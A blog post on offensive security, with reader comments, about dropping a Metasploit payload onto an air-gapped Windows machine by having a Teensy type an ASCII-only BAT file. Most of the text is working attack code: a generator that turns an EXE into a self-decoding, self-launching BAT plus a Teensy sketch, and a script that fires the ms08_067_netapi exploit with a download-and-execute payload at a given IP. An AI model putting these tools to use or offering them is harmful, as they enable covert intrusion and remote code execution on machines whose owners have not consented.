I don’t know if anybody will find this usable, but I thought it was a nice exercise and it was fun to code. In one of my previous posts I mentioned a restrictive scenario much like this …
Pentesters need to drop files on targets. If a box is not connected to the Internet and doesn’t accept removable storage, they need to come up with some tricks. Inputting the file via the keyboard is an option, but typing several million bytes by hand is not: this needs automation. So I’ve designed a Teensy dropper that uses pure ASCII to drop a single BAT file onto the target and execute it. So far I only have the BAT generator, which works well in my Win7 test environment. It should be trivial to convert the generated BAT to C code and program the Teensy with it.
The BAT generator uses code and the encoding taken from Terry Newton’s website, Binary2batch.
Damn the autoconversion of ASCII special char$ !!!
Encoder.sh
You need DOSBox for this to work, as the script uses a 16-bit DOS encoder to encode the executable into ASCII characters. The shell script is rather rough and has hardcoded strings such as the original executable name (a.exe); I could not come up with a way to pass a bash variable into the DOSBox command.
The first part is a CM3-encoded decoder, decbin.com, which decodes the Metasploit payload EXE. The second part is a CM3-encoded encoder, which encodes the Metasploit payload EXE.
So what you need is the actual Metasploit payload EXE: place it in the working directory where this script resides and rename it to a.exe (or modify the script to your needs).
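A compact generator in the same spirit, written here as an added example and not the post’s own Encoder.sh: it swaps the 16-bit decbin.com decoder (which needs NTVDM, so 32-bit Windows only) for certutil.exe, which ships with Windows 7, and emits a BAT made of nothing but hex digits, spaces, `>` and a few cmd keywords. The function names (`bin2bat`, `bat2hex`, `ascii_only`, `bat2teensy`, `make_sample`), the sample bytes, and the assumption that `certutil -decodehex` accepts the space-separated byte-pair layout written below are mine; only the offline round trip is verified.

```shell
#!/bin/sh
# Added example, not the post's Encoder.sh. Decoder on the target is
# certutil.exe ("certutil -decodehex in out") instead of decbin.com, so the
# BAT also works on 64-bit Windows 7 where the 16-bit emulation is absent.
# Assumption: certutil accepts the space-separated hex byte pairs written here.

# bin2bat SRC [EXE] [HEXFILE]: print a BAT that rebuilds SRC as EXE and starts
# it. Only hex digits, spaces, '>' and the letters of a few cmd keywords plus
# the two file names are emitted, so nothing needs escaping and a
# keyboard-emulating Teensy can type it verbatim.
bin2bat() {
    src=$1; exe=${2:-a.exe}; hexfile=${3:-a.hex}
    printf '@echo off\r\n'
    printf 'if exist %s del %s\r\n' "$hexfile" "$hexfile"
    # od: 16 bytes per line as lowercase hex pairs; -v keeps repeated lines
    # (od would otherwise collapse them into a '*' line and corrupt the dump).
    # The redirection goes first so a chunk ending in a digit can never be
    # parsed by cmd.exe as a handle number ("echo ...1>file" trap).
    od -An -v -tx1 "$src" | sed 's/^ *//; s/ *$//' |
    while IFS= read -r line; do
        printf '>>%s echo %s\r\n' "$hexfile" "$line"
    done
    printf 'certutil -decodehex %s %s >nul\r\n' "$hexfile" "$exe"
    printf 'del %s\r\n' "$hexfile"
    printf 'start %s\r\n' "$exe"
}

# bat2hex BAT HEXFILE: recover the hex stream the BAT writes on the target,
# i.e. exactly what certutil would see. Lets us check the round trip here.
bat2hex() {
    sed -n "s/^>>$2 echo //p" "$1" | tr -d ' \r\n'
}

# ascii_only FILE: succeed only if FILE holds nothing but printable ASCII
# (0x20-0x7e) and CR/LF, i.e. nothing a US keyboard cannot type.
ascii_only() {
    ! tr -d '\r\n' < "$1" | LC_ALL=C grep -q '[^ -~]'
}

# bat2teensy BAT: the "echo and sed" conversion into a Teensyduino sketch,
# one Keyboard.println() per BAT line. Assumes a cmd.exe window has focus;
# each line executes as it is typed, so the BAT itself never touches disk.
bat2teensy() {
    printf 'void setup() {\n  delay(5000); // time to focus cmd.exe (assumption)\n'
    tr -d '\r' < "$1" | sed 's/[\\"]/\\&/g; s/.*/  Keyboard.println("&"); delay(50);/'
    printf '}\nvoid loop() {}\n'
}

# make_sample FILE: constructed 22-byte stand-in for a payload EXE, with a
# DOS-header-like start, NUL bytes and high bytes to exercise the encoder.
make_sample() {
    printf 'MZ\220\000\003\000hello, world\r\n\377\376' > "$1"
}

# Usage: ./bin2bat.sh a.exe > dropper.bat ; ./bin2bat.sh -teensy dropper.bat
if [ "$#" -ge 1 ]; then
    case $1 in
        -teensy) bat2teensy "$2" ;;
        *) bin2bat "$@" ;;
    esac
fi
```

With 16 bytes per line each typed line stays around 60 characters, far below cmd.exe’s line limit, and the 50 ms delay between lines is a guess to let the prompt keep up; tune it on the real target.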
I find it incredible how it is possible to “abuse” the 16-bit binary emulation on modern 32-bit Windows. It’s a real jungle, and monkeys like the jungle …
And what’s Teensy, indeed?
I will post the Teensy C code generator later on. Or you can create your own using a couple of echo and sed commands on the generated BAT file.
In awe …
astrobaby, I speak Spanish, can I ask you some questions?
What do you want to know?
How can I transform Metasploit’s “ms08_067_netapi” and “download_exec” into one Linux standalone executable (without Metasploit installed)?
thank you
You still need Metasploit on the attacker box (or a stripped-down version containing only the ms08_067_netapi exploit). What I would do is create a bash script that automates all the tasks needed to load the ms08_067_netapi exploit. There are many examples on my blog of how this is done.
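The kind of wrapper the reply above has in mind, written as an added example and not the blog’s or the commenter’s script: it validates the target and URL, writes an msfconsole resource file that loads ms08_067_netapi with the windows/download_exec payload, and runs it. Metasploit must still be installed (msfconsole on PATH). The function names are mine, and the option names are those of current Metasploit (RHOSTS, URL; older releases spelled the target option RHOST), which is an assumption about the reader’s version.

```shell
#!/bin/sh
# Added example: one-shot driver for ms08_067_netapi + windows/download_exec.
# Not the post's or the commenter's code; needs msfconsole on PATH.

# is_ipv4 ADDR: succeed only for a dotted quad with octets 0-255, so a typo
# never lands in "set RHOSTS".
is_ipv4() {
    printf '%s\n' "$1" | LC_ALL=C grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    old_ifs=$IFS; IFS=.
    set -- $1
    IFS=$old_ifs
    for o in "$@"; do [ "$o" -le 255 ] || return 1; done
}

# gen_rc TARGET URL OUTFILE: write the msfconsole resource script.
# "check" runs the module's vulnerability check before "exploit";
# "exit" closes the console once the payload has been delivered.
gen_rc() {
    target=$1; url=$2; out=$3
    is_ipv4 "$target" || { echo "bad target: $target" >&2; return 1; }
    case $url in
        http://*|https://*) ;;
        *) echo "bad url: $url" >&2; return 1 ;;
    esac
    cat > "$out" <<EOF
use exploit/windows/smb/ms08_067_netapi
set RHOSTS $target
set PAYLOAD windows/download_exec
set URL $url
check
exploit
exit
EOF
}

# main TARGET URL: generate the resource file, run it quietly, clean up.
main() {
    rc=$(mktemp) || exit 1
    gen_rc "$1" "$2" "$rc" || { rm -f "$rc"; exit 1; }
    msfconsole -q -r "$rc"
    rm -f "$rc"
}

# Usage: ./msf_ms08.sh 10.0.0.5 http://10.0.0.1/a.exe
if [ "$#" -ge 2 ]; then
    main "$@"
fi
```

The URL must point at a web server the victim can reach; for the air-gapped scenario of the post that means a host the attacker stages on the same segment, not the Internet.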